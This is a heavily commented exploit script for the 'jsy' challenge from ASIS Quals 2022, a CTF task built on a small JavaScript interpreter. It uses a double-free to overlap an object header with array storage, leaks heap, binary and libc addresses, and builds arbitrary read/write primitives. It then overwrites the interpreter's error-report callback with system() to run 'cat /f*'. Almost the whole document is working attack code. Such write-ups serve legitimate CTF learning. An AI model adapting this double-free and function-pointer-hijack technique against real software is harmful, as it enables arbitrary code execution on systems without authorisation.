ASIS Quals 2022 - jsy
/*
tl;dr:
Double-free an object (a) so that a JsObject (d) ends up overlapping the element storage of a non-sparse array (c).
Indexing c[] then reads d's object header: pointers come back as strings, which u64() converts back to integers.
Writing a short string (shrstr, the inline form of a JsValue) through c[] overwrites d's array pointer, so d[0] becomes an arbitrary read/write primitive.
*/
/**
 * Format a non-negative integer as a "0x"-prefixed lowercase hex string.
 * Used only for the leak printouts.
 * @param {number} x - integer to format
 * @returns {string} e.g. hex(255) === "0xff"
 */
function hex(x) {
    var digits = x.toString(16);
    return "0x".concat(digits);
}
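/**
 * Hex-encode the UTF-16 code units of a string, one after another.
 *
 * Each code unit below 0x100 is written as exactly two lowercase hex digits so
 * the output stays byte-aligned for u64()/readhex(), which consume it in
 * two-digit groups. readhex() only passes characters that encodeURI() leaves
 * unescaped (all printable ASCII, >= 0x21), so the padding never changes that
 * caller's output; it only protects direct callers from control characters,
 * which previously produced a single digit and shifted every later byte.
 * Code units above 0xff still yield 3-4 digits and are NOT byte-aligned;
 * callers must pass ASCII/byte strings.
 *
 * Kept ES5-only (var, no padStart) to match the rest of the file and the
 * interpreter it targets.
 * @param {string} x - string to encode
 * @returns {string} lowercase hex digits, no separators
 */
function tohex(x) {
    var val = "";
    for (var i = 0; i < x.length; i++) {
        var code = x.charCodeAt(i).toString(16);
        // zero-pad to two digits so the result can be split into bytes
        if (code.length < 2) {
            code = "0" + code;
        }
        val += code;
    }
    return val;
}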
/**
 * Hex-encode the bytes of a string.
 *
 * encodeURI() escapes every byte outside the unreserved/reserved URI set as
 * %XX (UTF-8 bytes for non-ASCII), so after splitting the result on "%" the
 * first piece is plain text and every later piece starts with two hex digits
 * followed by more plain text. Escaped bytes are copied as-is (uppercase, as
 * encodeURI emits them); plain characters go through tohex() (lowercase).
 * parseInt(…, 16) in u64() accepts both cases. A "%" in the input is itself
 * escaped to "%25", so the split never sees a stray separator.
 * Note: encodeURI() throws URIError on lone surrogates.
 * @param {string} str - string whose bytes are wanted
 * @returns {string} hex digits, two per byte, no separators
 */
function readhex(str) {
    var pieces = encodeURI(str).split("%");
    var hexdigits = tohex(pieces[0]);
    for (var k = 1; k < pieces.length; k++) {
        var piece = pieces[k];
        hexdigits += piece.substring(0, 2) + tohex(piece.substring(2));
    }
    return hexdigits;
}
/**
 * Decode a leaked value: treat the bytes of `str` as a little-endian integer.
 *
 * readhex() yields two hex digits per byte in memory order; reversing the
 * pairs gives the big-endian digit string parseInt() expects. All bytes of the
 * string are used, so callers should pass exactly the 8-byte slot they want.
 * parseInt() returns a double, so values above 2^53 lose precision; userland
 * pointers (< 2^48) are unaffected. An empty string decodes to NaN.
 * @param {string} str - raw bytes as read back from the overlapped object
 * @returns {number} little-endian integer value of the bytes
 */
function u64(str) {
    var hexbytes = readhex(str);
    var bigEndian = "";
    var pos = hexbytes.length - 2;
    while (pos >= 0) {
        bigEndian += hexbytes.substr(pos, 2);
        pos -= 2;
    }
    return parseInt(bigEndian, 16);
}
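/**
 * Pack the low 48 bits of an integer as a 6-character little-endian string.
 *
 * Only hex positions 14..4 (the six least-significant bytes) are emitted: the
 * top two bytes of a userland pointer are zero and would only add NUL bytes
 * that the string-based write primitive cannot carry. Despite the name this
 * is a 48-bit packer.
 *
 * Each byte is written as a %XX escape and handed to decodeURIComponent().
 * decodeURI() was used before, but it leaves the reserved set ;/?:@&=+$,#
 * as literal "%XX" text, so any address containing one of those byte values
 * (0x23, 0x24, 0x26, 0x2b, 0x2c, 0x2f, 0x3a, 0x3b, 0x3d, 0x3f, 0x40) came
 * back three characters too long and the 14-byte slice in read()/write()
 * silently truncated it. decodeURIComponent() decodes every escape.
 *
 * Engine caveat: a spec-conforming engine (Node, browsers) throws URIError
 * when the escaped bytes are not valid UTF-8, i.e. for most real addresses.
 * The exploit relies on the target interpreter's decoder emitting the raw
 * bytes instead; that is a property of the target, not of this function.
 *
 * Also fixes an implicit global (`x`) in the original, which is a
 * ReferenceError under strict mode / ES modules.
 * @param {number} int - non-negative integer below 2^53 (negative values
 *   produce a malformed escape and throw URIError)
 * @returns {string} 6 characters, least-significant byte first
 */
function p64(int) {
    var digits = int.toString(16);
    while (digits.length < 16) {
        digits = "0" + digits;
    }
    var escaped = "";
    // `digits` is zero-padded, so every two-character slice is already a
    // complete %XX escape; no per-byte re-padding is needed.
    for (var i = 14; i >= 4; i -= 2) {
        escaped += "%" + digits.substring(i, i + 2);
    }
    return decodeURIComponent(escaped);
}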
// --- Heap groom -------------------------------------------------------------
// Goal (see the tl;dr at the top): make a JsObject (d) share memory with the
// element storage of a dense array (c), so that c[] indexes into d's object
// header and d[] dereferences whatever pointer c[] writes there.
// Every statement below allocates or frees in a deliberate order; do not
// reorder them. `free()` is a challenge-provided primitive, not a JS builtin.
var a = [13.37]
var b = [13.37]
free(a)
free(b)
// c's object header reuses b's chunk and its element storage reuses a's chunk:
// c->obj = b
// c->obj.arr = a
var c = [13.37, 13.37, 13.37, 13.37, 13.37]
// Double free: a's chunk is still live as c's element storage.
free(a)
// d's object header is carved out of that same chunk, so it now overlaps c's
// elements:
// d->obj = a
// c->obj.arr = d->obj
var d = [13.37]
// Leaks
// c[3] reads an element slot that now lies inside d's object header; the slot
// comes back as a string whose raw bytes are a heap pointer (u64 decodes it).
var tmp = c[3]
var heap_leak = u64(tmp)
// 0x6230 is the distance from that pointer to the heap base for this
// particular binary/allocator; recompute it if the target changes.
var heap = heap_leak - 0x6230
print("[*] Heap base @ "+hex(heap))
// Arbitrary read/write primitives. The target address is smuggled in as string
// bytes, so its low 6 bytes must not contain 0x00 (presumably a NUL terminates
// the string in the engine); p64() never emits the top two bytes at all.
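/**
 * Read the 8-byte value at `addr` through the overlapped object.
 *
 * Per the tl;dr, c's element storage overlaps d's object header. Storing a
 * 14-character string into c[4] places its bytes inline (shrstr) over d's
 * array pointer: 8 filler bytes followed by the 6 little-endian address bytes
 * from p64(). d[0] then dereferences that pointer and hands the memory back as
 * a string, which u64() turns into an integer.
 *
 * Uses the module-level c, d, p64 and u64. Avoids the implicit globals
 * (tmp_str, tmp) of the original, which break under strict mode.
 * @param {number} addr - address to read; must contain no 0x00 byte in its
 *   low 6 bytes
 * @returns {number} the value at addr (precision limited to 2^53)
 */
function read(addr) {
    var ptr = "aaaaaaaa" + p64(addr);
    c[4] = ptr.slice(0, 14);
    var leaked = d[0];
    return u64(leaked);
}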
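/**
 * Write the low 6 bytes of `val` at `addr` through the overlapped object.
 *
 * Same pointer-swap as read(): c[4] overwrites d's array pointer with `addr`.
 * Assigning a 6-character string to d[0] then stores that string's bytes
 * inline at addr (the shrstr form of a JsValue). Only 6 bytes of `val` are
 * written; the remaining bytes of the slot are whatever the engine writes
 * after a short string (terminator/padding) — enough for a userland pointer.
 *
 * Uses the module-level c, d and p64. Avoids the implicit globals of the
 * original, which break under strict mode.
 * @param {number} addr - target address; no 0x00 byte in its low 6 bytes
 * @param {number} val - value whose low 6 bytes are written
 */
function write(addr, val) {
    var ptr = "aaaaaaaa" + p64(addr);
    c[4] = ptr.slice(0, 14);
    var payload = p64(val).slice(0, 6);
    d[0] = payload;
}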
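/**
 * Write up to 7 characters of `str` at `addr` through the overlapped object.
 *
 * Same mechanism as write(), but the payload is a caller-supplied string
 * (used to drop the shell command). The 7-character cap is what fits the
 * inline short-string form used by the write primitive; longer input is
 * silently truncated, so commands must be kept within that budget.
 *
 * Uses the module-level c, d and p64. Avoids the implicit globals of the
 * original, which break under strict mode.
 * @param {number} addr - target address; no 0x00 byte in its low 6 bytes
 * @param {string} str - text to write; only its first 7 characters are used
 */
function write_str(addr, str) {
    var ptr = "aaaaaaaa" + p64(addr);
    c[4] = ptr.slice(0, 14);
    var payload = str.slice(0, 7);
    d[0] = payload;
}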
// More leaks
// All offsets below are specific to the challenge binary and its libc; they
// were recovered from that target and must be recomputed for any other build.
// heap+0x1538 holds a pointer into the interpreter binary (which field that
// is was not recorded here — confirm on the target).
var code_leak = read(heap + 0x1538)
var code = code_leak - 0x3aa5d
print("[*] Code base @ "+hex(code))
// GOT entry of exit() in the binary; reading it yields a libc pointer.
var exit_got = code + 0x4ee48
var libc_leak = read(exit_got)
var libc = libc_leak - 0x455f0
print("[*] Libc base @ "+hex(libc))
// Overwrite js_defaultreport with system
// `exception` is the heap slot holding the interpreter's error-report callback
// (js_defaultreport by default); replacing it with system() turns the next
// uncaught error into a system() call.
var system = libc + 0x50d60
var exception = heap + 0x2b8
write(exception, system)
// Overwrite js_State with arg
// The report callback presumably receives the js_State pointer as its first
// argument, so placing the command at the very start of js_State makes
// system() run it. write_str() only emits 7 characters, hence the 7-character
// glob "cat /f*".
var arg = "cat /f*"
var js_state = heap + 0x2a0
write_str(js_state, arg)
// system("cat /f*")
// a() is not callable, so this raises an error; the uncaught-error path
// invokes the overwritten callback with the js_State pointer -> system("cat /f*").
a()